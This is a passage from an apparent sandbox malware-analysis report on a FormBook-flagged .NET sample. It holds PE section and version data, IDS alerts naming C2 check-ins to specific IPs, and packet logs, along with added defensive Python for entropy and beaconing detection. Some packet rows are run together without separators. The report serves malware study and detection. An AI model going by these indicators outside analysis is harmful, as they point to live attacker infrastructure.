.reloc | 0x7a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
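The Entropy and ZLIB Complexity columns are the two cheap indicators that the .text section carries a packed or encrypted blob rather than ordinary compiled code: 7.42 bits per byte and a compressed size of about three quarters of the raw size, against 5.01 for the resource section and 0.10 for the near-empty .reloc. The following Python is an added example, not code from the report or from Joe Sandbox. It computes both numbers for arbitrary section bytes and applies thresholds of the kind an analyst would pick; the three sample buffers are constructed here, and treating ZLIB Complexity as the ratio of compressed to raw size is an assumption about the report's definition.

```python
import math
import random
import zlib


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer,
    8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_ratio(data: bytes) -> float:
    """Compressed size over raw size.  Assumed here to be what the report
    calls ZLIB Complexity: values near 1.0 mean the bytes are already
    compressed or encrypted, values near 0.0 mean padding or repetition."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def classify_section(name, data, executable, entropy_hi=7.0, ratio_hi=0.7):
    """Verdict for one section from its entropy and compressibility.
    The thresholds are analyst choices, not values taken from the report."""
    ent = shannon_entropy(data)
    ratio = zlib_ratio(data)
    if ent >= entropy_hi and ratio >= ratio_hi:
        verdict = ("packed/encrypted payload in code section"
                   if executable else "opaque data")
    elif ent < 1.0:
        verdict = "mostly padding"
    else:
        verdict = "normal"
    return {"section": name, "entropy": round(ent, 2),
            "zlib_ratio": round(ratio, 2), "verdict": verdict}


def demo_sections():
    """Constructed stand-ins for three kinds of section content."""
    rng = random.Random(20210223)  # deterministic stand-in for ciphertext
    encrypted = bytes(rng.getrandbits(8) for _ in range(65536))
    padding = b"\x00" * 4096
    text = b"This program cannot be run in DOS mode.\r\n" * 200
    return [
        classify_section(".text", encrypted, executable=True),
        classify_section(".reloc", padding, executable=False),
        classify_section(".rsrc", text, executable=False),
    ]


if __name__ == "__main__":
    for row in demo_sections():
        print(row)
```

Entropy alone misclassifies compressed resources and large string tables as packed; the compressibility ratio separates "already compressed or encrypted" from "merely varied", which is why the report carries both numbers per section.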

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x78090 | 0x34c | data | |
RT_MANIFEST | 0x783ec | 0xc0f | XML 1.0 document, UTF-8 Unicode (with BOM) text | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018
Assembly Version | 1.0.0.0
InternalName | KerbLogonSubmitType.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | RegisterVB
ProductVersion | 1.0.0.0
FileDescription | RegisterVB
OriginalFilename | KerbLogonSubmitType.exe

The embedded InternalName and OriginalFilename (KerbLogonSubmitType.exe) do not match the submitted file name, and CompanyName, LegalTrademarks and Comments are empty.

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/23/21-09:00:28.246241 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
02/23/21-09:00:33.481128 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 94.73.146.42
02/23/21-09:00:33.481128 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 94.73.146.42
02/23/21-09:00:33.481128 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 94.73.146.42
02/23/21-09:00:38.674968 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:38.674968 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:38.674968 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:38.814055 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49731 | 34.102.136.180 | 192.168.2.3
02/23/21-09:00:44.103740 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49737 | 34.102.136.180 | 192.168.2.3
02/23/21-09:00:49.240714 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:49.240714 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:49.240714 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 34.102.136.180
02/23/21-09:00:49.379719 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49738 | 34.102.136.180 | 192.168.2.3
02/23/21-09:00:54.643258 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3
02/23/21-09:01:16.266371 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49747 | 34.102.136.180 | 192.168.2.3
02/23/21-09:01:32.674674 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49751 | 34.102.136.180 | 192.168.2.3
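The Snort rows only show the check-ins that matched a signature; the TCP Packets table that follows records every connection the VM opened, and it is the cadence of those opens, not any single alert, that identifies the bot. Each new client port appears about 5.3 seconds after the previous one while the destination keeps changing (94.73.146.42, then 34.102.136.180 four times, then 154.80.226.18, then 52.128.23.153). The following Python is an added example, not part of the report and not Joe Sandbox code. It takes the first client-to-server packet of each connection, transcribed from that table with timestamps cut to microseconds, and tests for a regular period first per destination and then per infected host. The per-destination view flags only 34.102.136.180; the per-host view sees all seven opens as one beacon, with the 11-second gap before 52.128.23.153 treated as one missed interval. The thresholds are analyst choices.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

CLIENT = "192.168.2.3"

# Sample input: the first client->server packet of each TCP connection the
# sandbox VM opened, transcribed from the report's TCP Packets table.
# Fields: timestamp, client port, destination IP, destination port.
CONNECTION_OPENS = [
    ("2021-02-23 09:00:33.407541", 49724, "94.73.146.42", 80),
    ("2021-02-23 09:00:38.633469", 49731, "34.102.136.180", 80),
    ("2021-02-23 09:00:43.922801", 49737, "34.102.136.180", 80),
    ("2021-02-23 09:00:49.199274", 49738, "34.102.136.180", 80),
    ("2021-02-23 09:00:54.461687", 49744, "34.102.136.180", 80),
    ("2021-02-23 09:00:59.903522", 49745, "154.80.226.18", 80),
    ("2021-02-23 09:01:10.870951", 49746, "52.128.23.153", 80),
]


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def gaps(timestamps):
    """Inter-arrival times in seconds between consecutive connection opens."""
    ordered = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]


def periodic(deltas, min_gaps=2, tolerance=0.25, min_fraction=0.75):
    """Flag a beacon when most gaps sit close to the median period or to an
    integer multiple of it.  A multiple is read as a check-in that failed
    or was skipped, not as a change of cadence."""
    if len(deltas) < min_gaps:
        return False
    period = median(deltas)
    if period <= 0:
        return False
    hits = 0
    for d in deltas:
        k = max(1, round(d / period))
        if abs(d - k * period) <= tolerance * period:
            hits += 1
    return hits / len(deltas) >= min_fraction


def summarize(timestamps):
    deltas = gaps(timestamps)
    return {
        "connections": len(timestamps),
        "period_s": round(median(deltas), 2) if deltas else None,
        "beacon": periodic(deltas),
    }


def per_destination(conns):
    """Naive grouping: one timeline per (destination IP, destination port)."""
    groups = defaultdict(list)
    for ts, _sport, dst_ip, dst_port in conns:
        groups[(dst_ip, dst_port)].append(parse_ts(ts))
    return {dest: summarize(stamps) for dest, stamps in groups.items()}


def per_client(conns, client=CLIENT):
    """Grouping by infected host: one timeline across every destination,
    which is what catches a bot that walks a list of C2 hosts."""
    stamps = [parse_ts(ts) for ts, *_ in conns]
    result = summarize(stamps)
    result["client"] = client
    result["destinations"] = list(dict.fromkeys(dst for _, _, dst, _ in conns))
    return result


if __name__ == "__main__":
    for dest, summary in per_destination(CONNECTION_OPENS).items():
        print(dest, summary)
    print(per_client(CONNECTION_OPENS))
```

Group by the infected host, not the destination, when hunting for families that rotate through a list of C2 hosts: per destination, three of the four servers here are contacted exactly once and never look periodic, while the host-level timeline shows the same 5.3-second clock throughout.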

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 09:00:33.407541990 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.480822086 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.481100082 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.481127977 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.554670095 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.554917097 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.554956913 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.554985046 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.555100918 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.555182934 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.564821959 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:33.564934969 CET | 49724 | 80 | 192.168.2.3 | 94.73.146.42
Feb 23, 2021 09:00:33.628359079 CET | 80 | 49724 | 94.73.146.42 | 192.168.2.3
Feb 23, 2021 09:00:38.633469105 CET | 49731 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:38.674273014 CET | 80 | 49731 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:38.674552917 CET | 49731 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:38.674968004 CET | 49731 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:38.715584040 CET | 80 | 49731 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:38.814054966 CET | 80 | 49731 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:38.814071894 CET | 80 | 49731 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:38.814229012 CET | 49731 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:38.814296007 CET | 49731 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:38.854893923 CET | 80 | 49731 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:43.922801018 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:43.963917971 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:43.964036942 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:43.964195013 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:44.005198956 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:44.103739977 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:44.103795052 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:44.103934050 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:44.103986025 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:44.145189047 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:49.199274063 CET | 49738 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:49.240139008 CET | 80 | 49738 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:49.240278006 CET | 49738 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:49.240714073 CET | 49738 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:49.281544924 CET | 80 | 49738 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:49.379719019 CET | 80 | 49738 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:49.379745007 CET | 80 | 49738 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:49.379972935 CET | 49738 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:49.380029917 CET | 49738 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:49.421689034 CET | 80 | 49738 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:54.461687088 CET | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:54.502767086 CET | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:54.502882957 CET | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:54.503062010 CET | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:54.544015884 CET | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:54.643258095 CET | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:54.643286943 CET | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:54.643538952 CET | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:54.643569946 CET | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Feb 23, 2021 09:00:54.684475899 CET | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Feb 23, 2021 09:00:59.903522968 CET | 49745 | 80 | 192.168.2.3 | 154.80.226.18
Feb 23, 2021 09:01:00.252563953 CET | 80 | 49745 | 154.80.226.18 | 192.168.2.3
Feb 23, 2021 09:01:00.252765894 CET | 49745 | 80 | 192.168.2.3 | 154.80.226.18
Feb 23, 2021 09:01:00.252922058 CET | 49745 | 80 | 192.168.2.3 | 154.80.226.18
Feb 23, 2021 09:01:00.601605892 CET | 80 | 49745 | 154.80.226.18 | 192.168.2.3
Feb 23, 2021 09:01:00.606403112 CET | 80 | 49745 | 154.80.226.18 | 192.168.2.3
Feb 23, 2021 09:01:00.606431007 CET | 80 | 49745 | 154.80.226.18 | 192.168.2.3
Feb 23, 2021 09:01:00.609314919 CET | 49745 | 80 | 192.168.2.3 | 154.80.226.18
Feb 23, 2021 09:01:00.609343052 CET | 49745 | 80 | 192.168.2.3 | 154.80.226.18
Feb 23, 2021 09:01:00.958373070 CET | 80 | 49745 | 154.80.226.18 | 192.168.2.3
Feb 23, 2021 09:01:10.870951891 CET | 49746 | 80 | 192.168.2.3 | 52.128.23.153
Feb 23, 2021 09:01:10.922276974 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.922502995 CET | 49746 | 80 | 192.168.2.3 | 52.128.23.153
Feb 23, 2021 09:01:10.922751904 CET | 49746 | 80 | 192.168.2.3 | 52.128.23.153
Feb 23, 2021 09:01:10.973910093 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.973952055 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.973977089 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.973999023 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974023104 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974045038 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974069118 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974092007 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974112988 CET | 80 | 49746 | 52.128.23.153 | 192.168.2.3
Feb 23, 2021 09:01:10.974184990 CET | 49746 | 80 | 192.168.2.3 | 52.128.23.153
                                                                        Feb 23, 2021 09:01:10.974220037 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.974328995 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:16.086059093 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.126939058 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.127068996 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.127204895 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.167947054 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266371012 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266391993 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266540051 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.266608953 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.307312965 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:27.065510988 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.236430883 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.236623049 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.236773014 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.406384945 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410075903 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410100937 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410115957 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410130024 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410145998 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410161972 CET8049750198.185.159.144192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 08:59:15.725260019 CET | 56777 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:15.774024963 CET | 53 | 56777 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:15.791728020 CET | 58643 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:15.840475082 CET | 53 | 58643 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:16.036062002 CET | 60985 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:16.046003103 CET | 50200 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:16.094485044 CET | 53 | 60985 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:16.106811047 CET | 53 | 50200 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:16.682037115 CET | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:16.733700037 CET | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:17.228666067 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:17.290731907 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:17.689059019 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:17.737847090 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:18.879532099 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:18.931186914 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:19.853307962 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:19.905019045 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:20.881572962 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:20.930495977 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:22.022630930 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:22.074151039 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:23.100560904 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:23.149183035 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:23.897679090 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:23.949147940 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:25.216830969 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:25.265450954 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:26.185484886 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:26.234597921 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:27.032710075 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:27.089612007 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:27.917500019 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:27.974639893 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:29.076859951 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:29.125580072 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:32.685682058 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:32.743032932 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:35.290663004 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:35.339437008 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:36.662890911 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:36.714504004 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:37.917320013 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:37.968981028 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:51.693639994 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:51.752203941 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 08:59:54.171056032 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 08:59:54.219645023 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:09.312968969 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:09.372163057 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:26.176038027 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:27.186381102 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:28.202013016 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:28.240843058 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:28.246145964 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:28.262003899 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:33.254621983 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:33.352252007 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:35.870695114 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:35.948067904 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:36.551553965 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:36.620382071 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:37.183090925 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:37.242964983 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:37.469012976 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:37.534207106 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:37.668474913 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:37.753945112 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:38.263458967 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:38.323601961 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:38.567380905 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:38.631567001 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:38.887336969 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:38.947335958 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:39.565145016 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:39.625123978 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:40.473942041 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:40.530745029 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:41.331619024 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:41.388839006 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:41.814295053 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:41.874871016 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:43.862653017 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:43.921757936 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:49.115926027 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:49.198060989 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:50.392818928 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:50.451534986 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:54.395446062 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:54.460644007 CET | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:00:59.691766024 CET | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:00:59.902288914 CET | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:05.616384029 CET | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:05.689476967 CET | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:10.710935116 CET | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:10.869110107 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:16.014178991 CET | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:16.085098028 CET | 53 | 63978 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:17.498831034 CET | 62938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:17.547620058 CET | 53 | 62938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:19.892761946 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:19.949927092 CET | 53 | 55708 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:21.282691956 CET | 56803 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:21.344999075 CET | 53 | 56803 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:26.991563082 CET | 57145 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:27.056251049 CET | 53 | 57145 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:01:32.432291031 CET | 55359 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:01:32.493457079 CET | 53 | 55359 | 8.8.8.8 | 192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
